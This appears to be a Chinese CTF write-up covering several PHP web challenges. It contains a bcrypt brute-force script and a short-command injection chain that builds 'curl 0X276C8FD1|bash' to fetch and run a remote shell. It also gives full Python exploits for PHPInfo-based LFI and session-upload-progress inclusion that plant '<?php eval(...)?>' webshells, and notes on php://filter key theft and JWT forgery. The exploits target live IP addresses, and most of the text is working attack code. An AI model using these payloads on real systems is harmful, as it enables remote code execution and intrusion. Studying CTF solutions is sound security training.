        $๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ฆ๐Ÿ™ƒ =$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰[$๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€*4].$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰[$๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€*4+1].$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰[$๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€*4+2].$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰[$๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€*4+3];
        $๐Ÿ˜ช๐Ÿ˜พ๐Ÿ˜ž๐Ÿ˜€ =0;
        $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜ฆ๐Ÿ˜บ =0;
        for ($๐Ÿ˜ฑ๐Ÿ˜ฝ๐Ÿ™€๐Ÿ™ =0;$๐Ÿ˜ฑ๐Ÿ˜ฝ๐Ÿ™€๐Ÿ™<8;$๐Ÿ˜ฑ๐Ÿ˜ฝ๐Ÿ™€๐Ÿ™++) {
            for ($๐Ÿ˜ฑ๐Ÿ˜‚๐Ÿ™„๐Ÿ™‚=0;$๐Ÿ˜ฑ๐Ÿ˜‚๐Ÿ™„๐Ÿ™‚<16;$๐Ÿ˜ฑ๐Ÿ˜‚๐Ÿ™„๐Ÿ™‚++) {
                if($๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ฆ๐Ÿ™ƒ == $๐Ÿ[$๐Ÿ˜ฑ๐Ÿ˜ฝ๐Ÿ™€๐Ÿ™][$๐Ÿ˜ฑ๐Ÿ˜‚๐Ÿ™„๐Ÿ™‚]) {
                    $๐Ÿ˜ช๐Ÿ˜พ๐Ÿ˜ž๐Ÿ˜€=$๐Ÿ˜ฑ๐Ÿ˜ฝ๐Ÿ™€๐Ÿ™;
                    $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜ฆ๐Ÿ˜บ = $๐Ÿ˜ฑ๐Ÿ˜‚๐Ÿ™„๐Ÿ™‚;
                }
            }
        }
        $๐Ÿ˜ฒ๐Ÿ˜พ๐Ÿ˜ฆ๐Ÿ™„ = $๐Ÿ˜ช๐Ÿ˜พ๐Ÿ˜ž๐Ÿ˜€*16+$๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜ฆ๐Ÿ˜บ;
        $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜š๐Ÿ˜ผ = $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜š๐Ÿ˜ผ.("$๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ธ๐Ÿ™‰")($๐Ÿ˜ฒ๐Ÿ˜พ๐Ÿ˜ฆ๐Ÿ™„);
    }
    return ("$๐ŸŽ")($๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜š๐Ÿ˜ผ);
}
function ๐Ÿ˜๐Ÿ˜() {
    global $๐Ÿ,$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™…,$๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ธ๐Ÿ™‰,$๐ŸŽ,$๐Ÿ˜ฑ๐Ÿ˜จ๐Ÿ˜ž๐Ÿ™Š๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜ก๐Ÿ˜;
    $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜–๐Ÿ™…๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜š = ๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜œ๐Ÿ˜ƒ๐Ÿ˜ช๐Ÿ˜ธ๐Ÿ˜ณ๐Ÿ˜น๐Ÿ˜‰๐Ÿ˜ƒ๐Ÿ˜ด๐Ÿ˜ƒ๐Ÿ˜ณ๐Ÿ™†๐Ÿ˜ฑ๐Ÿ˜˜๐Ÿ˜ข๐Ÿ™„๐Ÿ˜ฒ๐Ÿ˜“๐Ÿ˜‰๐Ÿ™Š๐Ÿ˜ฉ๐Ÿ˜ง๐Ÿ˜…๐Ÿ˜ป๐Ÿ˜ฉ๐Ÿ˜ฝ๐Ÿ˜‰๐Ÿ˜„๐Ÿ˜œ๐Ÿ™‡๐Ÿ˜๐Ÿ˜).๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฒ๐Ÿ˜ง๐Ÿ˜ก๐Ÿ˜)($_SERVER[๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฅ๐Ÿ˜ป๐Ÿ˜ฆ๐Ÿ˜ž๐Ÿ˜ค๐Ÿ˜๐Ÿ˜ข๐Ÿ˜–๐Ÿ˜จ๐Ÿ˜€๐Ÿ˜–๐Ÿ˜•๐Ÿ˜ข๐Ÿ˜–๐Ÿ˜™๐Ÿ˜)]);
    ๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฒ๐Ÿ˜ง๐Ÿ™„๐Ÿ˜ป๐Ÿ˜ฑ๐Ÿ˜จ๐Ÿ˜™๐Ÿ˜)($๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜–๐Ÿ™…๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜š);
    ๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ธ๐Ÿ˜ป๐Ÿ˜ฑ๐Ÿ˜จ๐Ÿ˜™๐Ÿ˜)($๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜–๐Ÿ™…๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜š);
    if (isset($_GET[๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜๐Ÿ˜ป)]) && ($๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™…)($_GET[๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜๐Ÿ˜ป)]) <= 5) {
        @๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜ธ๐Ÿ˜ผ๐Ÿ˜ฉ๐Ÿ™‡๐Ÿ˜๐Ÿ˜)($_GET[๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜๐Ÿ˜ป)]);
    } else if (isset($_GET[๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ณ๐Ÿ˜ฝ๐Ÿ˜ฆ๐Ÿ™Š๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜ก๐Ÿ˜)])) {
        @๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜ธ๐Ÿ˜ผ๐Ÿ˜ฉ๐Ÿ™‡๐Ÿ˜๐Ÿ˜)(๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ณ๐Ÿ˜ฝ๐Ÿ˜€๐Ÿ˜ท๐Ÿ˜œ๐Ÿ˜จ๐Ÿ˜š๐Ÿ˜ฝ๐Ÿ˜™๐Ÿ˜‘๐Ÿ˜๐Ÿ˜) . $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜–๐Ÿ™…๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜š);
    }
}
$๐ŸŽฏ = new Bcrypt();
$๐Ÿ”‘ = $_POST[๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ณ๐Ÿ˜—๐Ÿ˜–๐Ÿ™Š๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ด๐Ÿ˜ป)];
$๐Ÿ”’ = ๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜š๐Ÿ˜”๐Ÿ˜š๐Ÿ˜…๐Ÿ˜š๐Ÿ˜”๐Ÿ˜•๐Ÿ™‡๐Ÿ˜š๐Ÿ˜–๐Ÿ˜š๐Ÿ˜“๐Ÿ˜ช๐Ÿ˜ฝ๐Ÿ˜ป๐Ÿ˜„๐Ÿ˜ฅ๐Ÿ˜จ๐Ÿ˜’๐Ÿ˜›๐Ÿ˜ฃ๐Ÿ˜ผ๐Ÿ˜–๐Ÿ˜ข๐Ÿ˜ฒ๐Ÿ˜ฅ๐Ÿ™€๐Ÿ˜•๐Ÿ˜ž๐Ÿ˜ป๐Ÿ˜ช๐Ÿ˜…๐Ÿ˜ฒ๐Ÿ˜˜๐Ÿ˜ฆ๐Ÿ™‰๐Ÿ˜ฃ๐Ÿ˜ฝ๐Ÿ˜ฆ๐Ÿ™ˆ๐Ÿ˜ฒ๐Ÿ˜ฆ๐Ÿ˜‘๐Ÿ™…๐Ÿ˜ž๐Ÿ˜ฝ๐Ÿ˜ž๐Ÿ˜ž๐Ÿ˜ฒ๐Ÿ˜บ๐Ÿ˜ด๐Ÿ˜€๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜‰๐Ÿ˜œ๐Ÿ˜ฉ๐Ÿ˜ƒ๐Ÿ™€๐Ÿ˜๐Ÿ˜๐Ÿ˜พ๐Ÿ˜ฉ๐Ÿ˜…๐Ÿ˜ฑ๐Ÿ˜–๐Ÿ˜ž๐Ÿ˜บ๐Ÿ˜ช๐Ÿ˜”๐Ÿ˜ผ๐Ÿ˜†๐Ÿ˜ข๐Ÿ˜—๐Ÿ˜ฟ๐Ÿ™Š๐Ÿ˜ด๐Ÿ˜๐Ÿ˜ธ๐Ÿ˜ผ);
if($๐ŸŽฏ->verify($๐Ÿ”‘, $๐Ÿ”’)) {
    echo(๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ ๐Ÿ˜“๐Ÿ˜‰๐Ÿ˜น๐Ÿ˜ณ๐Ÿ˜บ๐Ÿ˜…๐Ÿ˜ก๐Ÿ˜ฉ๐Ÿ˜จ๐Ÿ˜ž๐Ÿ™Š๐Ÿ˜ด๐Ÿ˜‚๐Ÿ˜‰๐Ÿ™‰๐Ÿ˜ช๐Ÿ˜“๐Ÿ˜’๐Ÿ˜‚๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜š๐Ÿ™€๐Ÿ˜ช๐Ÿ˜ฝ๐Ÿ˜ผ๐Ÿ˜ผ๐Ÿ˜ช๐Ÿ˜“๐Ÿ˜•๐Ÿ˜ˆ๐Ÿ˜œ๐Ÿ˜‚๐Ÿ˜š๐Ÿ™‰๐Ÿ˜ ๐Ÿ˜ท๐Ÿ˜๐Ÿ˜));
    echo(๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฆ๐Ÿ˜‚๐Ÿ˜‰๐Ÿ˜ƒ๐Ÿ˜™๐Ÿ˜ฃ๐Ÿ˜–๐Ÿ˜Ÿ๐Ÿ˜ฒ๐Ÿ˜ƒ๐Ÿ˜ณ๐Ÿ™ƒ๐Ÿ˜ฑ๐Ÿ˜—๐Ÿ˜–๐Ÿ˜บ๐Ÿ˜ฑ๐Ÿ™‰๐Ÿ˜’๐Ÿ™€๐Ÿ˜ด๐Ÿ˜“๐Ÿ˜•๐Ÿ˜ˆ๐Ÿ˜œ๐Ÿ˜‚๐Ÿ˜š๐Ÿ™‰๐Ÿ˜ ๐Ÿ˜ท๐Ÿ˜๐Ÿ˜));
    ๐Ÿ˜๐Ÿ˜();
} else {
    echo(๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ ๐Ÿ˜“๐Ÿ˜‰๐Ÿ˜น๐Ÿ˜ณ๐Ÿ˜บ๐Ÿ˜…๐Ÿ˜ก๐Ÿ˜ฉ๐Ÿ˜จ๐Ÿ˜ž๐Ÿ™Š๐Ÿ˜ด๐Ÿ˜‚๐Ÿ˜‰๐Ÿ™‰๐Ÿ˜ช๐Ÿ˜“๐Ÿ˜’๐Ÿ™…๐Ÿ˜ฒ๐Ÿ˜ƒ๐Ÿ˜ก๐Ÿ˜ท๐Ÿ˜ฒ๐Ÿ˜ง๐Ÿ˜–๐Ÿ˜€๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ท๐Ÿ˜ธ๐Ÿ˜ ๐Ÿ˜“๐Ÿ˜‰๐Ÿ˜น๐Ÿ˜ณ๐Ÿ˜บ๐Ÿ˜„๐Ÿ˜));
}
Password not match!
  • ๅๆททๆท†
require 'vendor/autoload.php';// composer ๅŒ… ๅผ•็”จ็š„ไธ€ไธช็‰นๅพ,  ๆญคๅค–jsonๆ–‡ไปถๅฏไปฅ่ฎฟ้—ฎ composer.json
// ๅœจๆœฌๅœฐๅฎ‰่ฃ… composer polarising/bcrypt 
use Bcrypt\Bcrypt;
# highlight_file(__FILE__);
ini_set("display_errors","On");

function ๐Ÿ˜๐Ÿ˜() { // ไธŠ้ข็š„๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ ่งฃๆททๆท† ๅ‡ฝๆ•ฐๅฏไปฅไธ็ฎก
    //
    global $๐Ÿ,$strlen,$chr,$base64_decode,$isset;
    $path = '/var/www/html/sandbox/'.md5($_SERVER['REMOTE_ADDR']);
    mkdir($path);
    chdir($path);
    if (isset($_GET['cmd']) && ($strlen)($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (!isset($_GET['reset'])) {
        @exec('rm -rf '. $path);
    }
}
$๐ŸŽฏ = new Bcrypt();
$๐Ÿ”‘ = $_POST['passwd']; 
$๐Ÿ”’ = '$2y$10$RBfi8QpJJQQmJD6FylurJeqmP.6cMn7tdoKczL2v9hScd9zDj3wXe';
if($๐ŸŽฏ->verify($๐Ÿ”‘, $๐Ÿ”’)) { // ไฟฎๆ”นๆ‰ง่กŒ้กบๅบ
    echo('</br>Password verified!</br>');
    echo('Wow!!Now,hack it!</br>');
    ๐Ÿ˜๐Ÿ˜();
} else {
    echo('</br>Password not match!</br>');
}

ๅๆททๆท†็š„่ฏ,ๅฏไปฅไฝฟ็”จxdebugๆ–นๅผ่Žทๅ–ใ€‚ไนŸๅฏไปฅๅœจๅˆฉ็”จ่งฃๅฏ†่Žทๅ–ๅŽŸๆฅ็š„ๅ‚ๆ•ฐ

  • ่Žทๅพ— $2y$10\$RBfi8QpJJQQmJD6FylurJeqmP.6cMn7tdoKczL2v9hScd9zDj3wXe ๅŽŸๆ–‡
// ้ข„่ฎก2-3ๅฐๆ—ถ ๅฏไปฅๅผ€ๅคš็บฟ็จ‹  ่ฟ™ไธชๅชๆ˜ฏไธ€ไธช้™คๆšด็š„ไปฃ็ 
<?php
require 'vendor/autoload.php';
use Bcrypt\Bcrypt;
$key  = "abcdefghijklmnopqrstuvwxyz";

$bcrypt = new Bcrypt();
$plaintext = 'bcrypt';//bcryptyyds
$ciphertext = '$2y$10$RBfi8QpJJQQmJD6FylurJeqmP.6cMn7tdoKczL2v9hScd9zDj3wXe';
for($i=0;$i<26;$i++)
{
    for($j=0;$j<26;$j++)
    {
        for($k=0;$k<26;$k++)
        {
            for($m=0;$m<26;$m++)
            {
                echo $plaintext.$str.PHP_EOL;
                $str = $key[$i].$key[$j].$key[$k].$key[$m];
                if($bcrypt->verify($plaintext.$str, $ciphertext)){

                    echo("</br>Password verified!</br>");
                    echo("Wow!!Now,hack it!</br>");
                }
            }
        }
    }
}
  • strlen(cmd) <= 5 ็š„ ๅ‘ฝไปคๆ‰ง่กŒ
import HackRequests
import requests
from urllib.parse import quote
from time import sleep

url = "http://219.219.61.234:10048/?cmd="
payload = [
    # generate "g> ht- sl" to file "v"
    '>dir', 
    '>sl', 
    '>g\>',
    '>ht-',
    '*>v',

    # reverse file "v" to file "x", content "ls -th >g"
    '>rev',
    '*v>x',

    # generate "curl 0X276C8FD1|bash"
    '>sh ',
    '>ba\\',
    '>\|\\',
    '>\\',
    '>D1\\',
    '>8F\\',
    '>6C\\',
    '>27\\',
    '>0X\\',
    '>\ \\',
    '>rl\\',
    '>cu\\',

    # got shell
    'sh x',
    'sh g',
]

for i in payload:
    assert len(i) <= 4
    data = {
        'passwd':'bcryptyyds',
    }
    header = {
    "Content-Type" : "application/x-www-form-urlencoded",
    "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "Upgrade-Insecure-Requests" : "1"
    }
    r = requests.post(url + quote(i),data=data,headers=header)
    print(i)
    sleep(0.1)

ๅˆฐๆญค็ป“ๆŸ

web7 -Try:GET_file

WEb: GET_file
HINT1 ๏ผšdirsearch the path ไผšๅ‘็Žฐๅญ˜ๅœจphpinfo.php ไผšๅพˆ่‡ช็„ถ็š„ๆƒณๅˆฐPHPINFO LFI
ๆ–นๆณ•ไธ€
ๅŸบๆœฌๅŽŸ็†ๆ˜ฏๅˆฉ็”จไธŠไผ ๆ—ถ็š„TMPๆ–‡ไปถ๏ผˆๅ†…ๅฎนๅฏๆŽง๏ผ‰่ฟ›่กŒๅŒ…ๅซ,ไปŽ่€Œwebshell
้šพ็‚นๅœจไบŽๅœจphpๆ–‡ไปถ่งฃๆžๅ‰tmpๆ–‡ไปถไผš่ขซๅˆ ้™ค
ๆˆ‘ไปฌๅฏไปฅๅˆฉ็”จsocketๆฅ่ฏปๅ–PHPINFOๆ–‡ไปถ่Žทๅพ—tmpๆ–‡ไปถ,่€Œไธๆ˜ฏ็ญ‰phpๆ–‡ไปถๅ…จ้ƒจ่งฃๆžๅฎŒ
ๆ–นๆณ•ไบŒ
ๅˆฉ็”จsession ไธŠไผ ๆœบๅˆถ,ๅฏไปฅ็›ดๆŽฅไธŠไผ shell๏ผŒๅœจๆœฌๅœฐๅŒ…ๅซๅณๅฏ
ๅ…ˆ็คบ่Œƒๆ–นๆณ•ไบŒ
uploadprogress/tmp/7IDUrqGOt8PMATm852/flag.txt
ๅพ—ๅˆฐflagๅœฐๅ€
ๅฝ“ไธŠไผ ๅœๆญขๆ—ถ,sess_fe1w0ไธบ็ฉบ๏ผ›ไฝ†ๅฝ“็ซžไบ‰ไธŠไผ ๆ—ถ๏ผŒๅ†…ๅฎนไธบ
uploadprogress<?php eval($_POST["cmd"]);?>|a:5:{s:10:"start_time";i:1601320350;s:14:"content_length";i:51480;s:15:"bytes_processed";i:5254;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:8:"test.txt";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1601320350;s:15:"bytes_processed";i:5254;}}}
ๅ†ๅฝ“ไฝ ๅŒ…ๅซsessๆ—ถ,ๅฐฑๆ˜ฏ่งฃๆžๅ…ถไธญ็š„PHP่ฏญๅฅ ๅฆ‚๏ผš<?php eval($_POST["cmd"]);?>

ๆญคๅค„็คบ่Œƒๆ–นๆณ•ไธ€:
ๅ…ถๅŸบๆœฌๆ€ๆƒณไนŸๆ˜ฏๅˆฉ็”จไธŠไผ ๆœบๅˆถใ€็ซžไบ‰ไธŠไผ 
ๆณจๆ„ apache2้œ€่ฆ้‡็ฝฎ
่ฟ™ไธชๆ–นๆณ•็š„ๅฎž็Žฐ้œ€่ฆๆœ‰่พƒๅฅฝ็š„็ฝ‘็ปœ้“พๆŽฅใ€‚ใ€‚ใ€‚

ๆˆ‘ไปฌๅฏไปฅ็œ‹ไธ€็‚น /tmp/g ไธญ็š„ๅ†…ๅฎน ไธŽpayload ไธ€่‡ด
ไน‹ๅŽๅช้œ€ๆœฌๅœฐๅŒ…ๅซๅฐฑ่กŒ
ๅพ—ๅˆฐflagๅœฐๅ€
/tmp/7IDUrqGOt8PMATm852/flag.txt
CUMTCTF{Orz_to_php1nf0}

่งฃๆณ•ไธ€

ๆ‰ซๆ่ทฏๅพ„ๅพ—ๅˆฐphpinfo.php

็Ÿฅ่ฏ†็‚น:

  • phpไผšๆŠŠpost่ฏทๆฑ‚, ๅญ˜ๅ‚จๅœจไธดๆ—ถๆ–‡ไปถไธญ, ๅนถๅœจ่ฏทๆฑ‚็ป“ๆŸๅŽๅˆ ้™คไธดๆ—ถๆ–‡ไปถ
  • phpinfoไธญไผšๆ˜พ็คบ_FILEๅ˜้‡, ๅ…ถไธญไผšๆ˜พ็คบไธดๆ—ถๆ–‡ไปถ่ทฏๅพ„
  • ๅ‘้€ๅคงๆ•ฐๆฎ้‡็š„่ฏทๆฑ‚, ๆญคๅค–ๅˆฉ็”จsocketๆฅ่ฎฟ้—ฎphpinfo๏ผŒ่Žทๅพ—ไธดๆ—ถๆ–‡ไปถๅœฐๅ€

exp

#!/usr/bin/python 
import sys
import threading
import socket

def setup(host, port):
    TAG="Security Test"
    PAYLOAD="""%s\r
<?php file_put_contents('/tmp/g', '<?php eval($_REQUEST[1])?>')?>\r""" % TAG
    REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
    padding="A" * 5000
    REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
    #modify this to suit the LFI script   
    LFIREQ="""GET /index.php?file=%s HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""
    return (REQ1, TAG, LFIREQ)

def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    

    s.connect((host, port))
    s2.connect((host, port))

    s.send(phpinforeq)
    d = ""
    while len(d) < offset:
        d += s.recv(offset)
    try:
        i = d.index("[tmp_name] => ")
        fn = d[i+17:i+31]
    except ValueError:
        return None

    s2.send(lfireq % (fn, host))
    d = s2.recv(4096)
    s.close()
    s2.close()

    if d.find(tag) != -1:
        return fn

counter=0
class ThreadWorker(threading.Thread):
    def __init__(self, e, l, m, *args):
        threading.Thread.__init__(self)
        self.event = e
        self.lock =  l
        self.maxattempts = m
        self.args = args

    def run(self):
        global counter
        while not self.event.is_set():
            with self.lock:
                if counter >= self.maxattempts:
                    return
                counter+=1

            try:
                x = phpInfoLFI(*self.args)
                if self.event.is_set():
                    break                
                if x:
                    print "\nGot it! Shell created in /tmp/g"
                    self.event.set()

            except socket.error:
                return

def getOffset(host, port, phpinforeq):
    """Gets offset of tmp_name in the php output"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    s.send(phpinforeq)

    d = ""
    while True:
        i = s.recv(4096)
        d+=i        
        if i == "":
            break
        # detect the final chunk
        if i.endswith("0\r\n\r\n"):
            break
    s.close()
    i = d.find("[tmp_name] => ")
    if i == -1:
        raise ValueError("No php tmp_name in phpinfo output")

    print "found %s at %i" % (d[i:i+10],i)
    # padded up a bit
    return i+256

def main():

    print "LFI With PHPInfo()"
    print "-=" * 30

    if len(sys.argv) < 2:
        print "Usage: %s host [port] [threads]" % sys.argv[0]
        sys.exit(1)

    try:
        host = socket.gethostbyname(sys.argv[1])
    except socket.error, e:
        print "Error with hostname %s: %s" % (sys.argv[1], e)
        sys.exit(1)

    port=80
    try:
        port = int(sys.argv[2])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with port %d: %s" % (sys.argv[2], e)
        sys.exit(1)

    poolsz=10
    try:
        poolsz = int(sys.argv[3])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with poolsz %d: %s" % (sys.argv[3], e)
        sys.exit(1)

    print "Getting initial offset...",  
    reqphp, tag, reqlfi = setup(host, port)
    offset = getOffset(host, port, reqphp)
    sys.stdout.flush()

    maxattempts = 1000
    e = threading.Event()
    l = threading.Lock()

    print "Spawning worker pool (%d)..." % poolsz
    sys.stdout.flush()

    tp = []
    for i in range(0,poolsz):
        tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))

    for t in tp:
        t.start()
    try:
        while not e.wait(1):
            if e.is_set():
                break
            with l:
                sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
                sys.stdout.flush()
                if counter >= maxattempts:
                    break
        print
        if e.is_set():
            print "Woot!  \m/"
        else:
            print ":("
    except KeyboardInterrupt:
        print "\nTelling threads to shutdown..."
        e.set()

    print "Shuttin' down..."
    for t in tp:
        t.join()

if __name__=="__main__":
    main()

image-20200929031823629

่งฃๆณ•ไบŒ

ๅˆฉ็”จseesion ๆœบๅˆถ,ๅฐ†shellๅ†™ๅ…ฅsessionๆ–‡ไปถ

  • exp
import io
import requests
import threading
sessid = 'XZASFE1W0'
data = {"cmd":'system("find / -name flag*);'}
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post( 'http://202.119.201.197:13077/', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('test.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):  
    while True:
        resp = session.post('http://202.119.201.197:13077/?file=/tmp/sess_'+sessid,data=data)
        if 'test.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,30): 
            threading.Thread(target=write,args=(session,)).start()
        for i in range(1,30):
            threading.Thread(target=read,args=(session,)).start()
    event.set()

ๆฒกๆœ‰ไบบๆฏ”ๆˆ‘ๆ›ดๆ‡‚๐Ÿ‘๐Ÿ‘Œ๐Ÿ™Œ

่ฟ™้ข˜็”ฑไบŽdocker็Žฏๅขƒๆœ‰้—ฎ้ข˜,ๆŽจ่ๅœจ็‰ฉ็†ๆœบไธŠๆต‹่ฏ•
ๆ นๆฎๆ็คบไธ€ๆญฅๆญฅ่ฎฟ้—ฎ
ไน‹ๅŽ ้œ€่ฆๆณจๆ„ๆŸฅ็œ‹cookie
ๆœ‰ไธ€ไธชJWT json web token
ๆ นๆฎๆ็คบ post path
ๅ†ๆ นๆฎไน‹ๅ‰็š„hint
่ฟ™้‡Œๅ‘็Žฐๆฒกๆœ‰ๆ‰ง่กŒindex.php
path=php://filter/convert.quoted-printable-encode/resource=/fe1w0/../proc/self/cwd/index.php
่Žทๅพ—็ง้’ฅๅœฐๅ€
fe1w0/fba60b53-0016-41ef-8c12-615c02768b12_fe1w0_own_rsa_private_key.pem
ไน‹ๅŽไฝฟ็”จ็ง้’ฅ็”Ÿไบงadmin็š„JWT
ไปฃ็ ๅฆ‚ไธ‹:

  • ๆ›ฟๆข admin ็š„JWT ่Žทๅพ—flag
